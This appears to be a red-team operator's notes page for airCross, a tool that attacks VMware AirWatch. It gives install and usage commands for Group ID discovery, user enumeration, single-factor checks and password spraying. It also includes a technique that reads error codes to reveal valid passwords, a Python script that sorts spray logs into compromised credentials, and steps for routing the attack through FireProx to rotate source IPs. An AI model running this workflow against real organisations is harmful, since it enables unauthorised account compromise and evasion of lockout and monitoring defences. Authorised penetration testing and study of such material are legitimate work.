IMPORTANT NOTE:

2022-09-16: Initial indications are that if your customer uses AirWatch, they will have a vulnerable certificate in ADCS by default. (Internal escalation to DA.)

  • First noted on 2022-875 red team.
  • I’ll update this with more as additional info comes in.

airCross - AirWatch attack tool

  • User enumeration
  • Multi-factor authentication (MFA) bypass
  • Password spraying

Reference: https://github.com/optiv/airCross

Install

# Install Go if it's not already installed
sudo apt update
sudo apt install -y golang

# Install the golang "net" module (dependency). Installing ./... builds every package in the cloned repo; plain "go install net" only refers to the standard-library net package.
git clone https://github.com/golang/net.git net
cd net
go install ./...

# Clone airCross as a subdirectory of net. Required for how Go modules work (AFAIK)
git clone https://github.com/optiv/airCross
cd airCross
go build ./airCross.go

# Now you should be able to run airCross
./airCross

# :)

Usage

  1. AirWatch domain and Group ID discovery:
./airCross gid-disco <DOMAIN>
  2. Validate the Group ID and check whether single-factor authentication (no MFA) is in use:
./airCross gid-val -gid <GROUP ID> <AIRWATCH SUBDOMAIN>
  3. Enumerate valid users. Each check generates a real login attempt:
./airCross auth-reg -u <EMAIL ADDRESS> -p <PASSWORD> -gid <GROUP ID> <AIRWATCH SUBDOMAIN>

Output of a valid user enumerated looks like:

[-] [jdoe@example.com:test:AUTH-1001] Authentication Failure

Invalid user output looks like:

[-] [doesnotexist@example.com:test:AUTH--1] Invalid GroupID

IMPORTANT: You will also get the Invalid GroupID message if a user’s credentials are valid but the user does not have permission to log in to AirWatch. (For example, if they are not a member of the appropriate group.)

Recommended workaround: Run username enumeration first with a password that cannot be valid (for example, a single character like “1”, which no sane length policy allows). Once users are validated, run password sprays. Any Invalid GroupID messages in the spray output for an already-validated user then indicate a valid password for a user who simply cannot log in to AirWatch.

  4. Execute user enumeration / password spraying:
    • Log the output with tee!!
    • I also logged the output with script as a backup. :P
script <SCRIPT OUTPUT FILE>

./airCross auth-reg -t 1 -gid <GROUP ID> -p '<PASSWORD>' <AIRWATCH SUBDOMAIN> <FILE CONTAINING TARGET EMAIL ADDRESSES> | tee -a <TEE OUTPUT FILE>

exit
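To make the two-pass workflow above (enumerate with an impossible password, then spray, then re-read the Invalid GroupID lines) mechanical, here is an added Python example that is not part of airCross or of these original notes. It parses the tee/script logs, takes the valid-user set from the enumeration run, and then treats an Invalid GroupID result for an already-validated user in the spray log as a valid password for an account without AirWatch access. The sample log lines are constructed, and the only result codes it interprets are the two shown above (AUTH-1001 and AUTH--1); any other code is flagged for manual review rather than interpreted, since these notes do not document what a successful login line looks like.

```python
"""Triage airCross auth-reg output: enumeration run first, then the spray run.

Added example (not part of airCross). Assumes the two result codes documented
in the notes: AUTH-1001 "Authentication Failure" (account exists, password wrong)
and AUTH--1 "Invalid GroupID" (unknown user, OR valid credentials for a user
without AirWatch access). Any other code is flagged for manual review.
"""
import re
from typing import Dict, Iterable, List, Optional, Set, Tuple

# Result line shape from the notes:  [-] [user:password:AUTH-code] message
# The password field is matched greedily so a password containing ':' still parses.
LINE_RE = re.compile(
    r"^\[.\]\s+\[(?P<user>[^:\s\]]+):(?P<password>.*):(?P<code>AUTH--?\d+)\]\s+(?P<msg>.*)$"
)

CODE_AUTH_FAILURE = "AUTH-1001"  # user exists, password wrong
CODE_INVALID_GID = "AUTH--1"     # unknown user, or valid password without AirWatch access

# Constructed sample logs (not real engagement output). The enumeration run used
# the impossible password "1"; the spray run used one candidate password.
ENUM_LOG = """\
Script started on 2022-09-16 10:00:00
[-] [jdoe@example.com:1:AUTH-1001] Authentication Failure
[-] [asmith@example.com:1:AUTH-1001] Authentication Failure
[-] [bbrown@example.com:1:AUTH-1001] Authentication Failure
[-] [doesnotexist@example.com:1:AUTH--1] Invalid GroupID
"""

SPRAY_LOG = """\
[-] [jdoe@example.com:Summer2022!:AUTH-1001] Authentication Failure
[-] [asmith@example.com:Summer2022!:AUTH--1] Invalid GroupID
[-] [bbrown@example.com:Summer2022!:AUTH-1001] Authentication Failure
[-] [doesnotexist@example.com:Summer2022!:AUTH--1] Invalid GroupID
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return user/password/code/msg for one airCross result line, else None."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def valid_users_from_enum(lines: Iterable[str]) -> Set[str]:
    """Enumeration run with a password that cannot be valid:
    AUTH-1001 means the account exists; AUTH--1 means it does not."""
    return {
        r["user"]
        for r in map(parse_line, lines)
        if r is not None and r["code"] == CODE_AUTH_FAILURE
    }


def triage_spray(lines: Iterable[str], valid_users: Set[str]) -> Dict[str, List[Tuple[str, str]]]:
    """Classify spray results using the user set from the enumeration run."""
    out: Dict[str, List[Tuple[str, str]]] = {
        "valid_password_no_airwatch_access": [],
        "bad_password": [],
        "invalid_user": [],
        "review_manually": [],
    }
    for line in lines:
        r = parse_line(line)
        if r is None:
            continue  # script(1) headers, banners, blank lines
        pair = (r["user"], r["password"])
        if r["code"] == CODE_AUTH_FAILURE:
            out["bad_password"].append(pair)
        elif r["code"] == CODE_INVALID_GID and r["user"] in valid_users:
            # Enumeration already proved the account exists, so "Invalid GroupID"
            # now means the password is right but the user cannot log in to AirWatch.
            out["valid_password_no_airwatch_access"].append(pair)
        elif r["code"] == CODE_INVALID_GID:
            out["invalid_user"].append(pair)
        else:
            out["review_manually"].append(pair)  # undocumented code: could be a success
    return out


if __name__ == "__main__":
    users = valid_users_from_enum(ENUM_LOG.splitlines())
    print("valid users:", sorted(users))
    for category, hits in triage_spray(SPRAY_LOG.splitlines(), users).items():
        for user, password in hits:
            print(f"{category}: {user} / {password}")
```

Run it against the real files by replacing ENUM_LOG and SPRAY_LOG with the contents of the tee output files from each pass; keep the enumeration and spray logs separate, because the same Invalid GroupID line means different things in each.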

airCross with FireProx

  1. Perform AirWatch domain and Group ID discovery as described above.

  2. Record the Group ID for use in user enumeration and password spraying.

  3. Record the authentication endpoint for use in FireProx function creation.

  4. Generate a FireProx URL that points to the authentication endpoint from the discovery step. Best AWS walkthrough is here: https://bond-o.medium.com/aws-pass-through-proxy-84f1f7fa4b4b.

  5. Pass the recorded Group ID and the FireProx URL, without the URL scheme (no https://), as arguments to your airCross invocation; the FireProx host takes the place of <AIRWATCH SUBDOMAIN>.